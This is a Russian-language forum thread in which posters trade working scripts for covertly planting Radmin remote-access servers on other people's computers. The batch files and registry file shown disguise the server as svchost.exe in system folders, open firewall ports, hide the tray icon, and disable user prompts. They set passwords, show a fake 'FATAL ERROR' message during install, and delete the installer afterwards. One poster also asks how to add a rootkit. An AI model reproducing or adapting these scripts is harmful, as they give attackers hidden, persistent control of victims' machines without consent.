у меня была трабла:
у человека на порту 4899 стоял r_server
я закинул ему еще два переименованых радмин сервера переименованых в svchost работающих на 4898 и 4897 портах
настроил эти два через командную строку путем следующих команд:
%SYSTEMROOT%/help\svchost.exe /install /silence
%SYSTEMROOT%/help\svchost.exe /port:4898 /pass:tratata /save /silence
%SYSTEMROOT%/help\svchost.exe /start
и
%SYSTEMROOT%/config\svchost.exe /install /silence
%SYSTEMROOT%/config\svchost.exe /port:4897 /pass:tratata /save /silence
%SYSTEMROOT%/config\svchost.exe /start
в каждую директорию закидывал три файла:
svchost.exe
AdmDll.dll
raddrv.dll
собственно сама проблема с серверами на портах 4898 и 4897:
через обмен файлов и телнет конектилось отлично но "управление" и "просмотр" не работали.
после ввода пароля появлялась заставочка как при загрузке экрана и потом просто исчезала
версия сервера 2.2 версия клиента 3.2
при этом на 4899 портустоит такая точно 2.2 версия и она нормально работает
как думаете в чем может быть проблема?
з.ы. а сегодня сервера работать перестали ( видимо ктото спалил их нодом (
Сообщение от
immortal16
я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:
@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
а вот что в файле 111.reg?
а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!
содержание файла 111.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5, 89,e4,b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28
факю по файлам бат и рег в первых двух постах этой темы
чтобы файлы удалялись прописываешь в бат файле в конце:
где xxx.xx название файла который надо удалить
лично у меня бат файл был следующего содержания:
@echo off
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
добавление в встроеный в винду файрвол исключения
netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "Remote Administrator Server" ENABLE
открытие нужного порта (у меня без этого не всегда работало) во все том же файрволе:
netsh firewall add portopening TCP 4897 svchost
копируем имеющиеся ключи реестра в файлик 123.reg :
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
удаляем имеющиеся ключи реестра:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
копируем нужные файлы в нужную директорию:
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
добавляем в реестр то что нам надо из файлика 111.reg:
reg import 111.reg
regedit /s 111.reg
устанавливаем сервер без уведомлений пользователя:
"%SYSTEMROOT%/help\svchost.exe" /install /silence
настраиваем сервер на 5001 порт, ставим пароль 123 без уведомления пользователя:
"%SYSTEMROOT%/help\svchost.exe" /port:5001 /pass:123 /save /silence
запускаем сервер:
"%SYSTEMROOT%/help\svchost.exe" /start
удаляем все что мы использовали для установки:
del svchost.exe
del raddrv.dll
del AdmDll.dll
del 111.reg
del 123.reg
del start.bat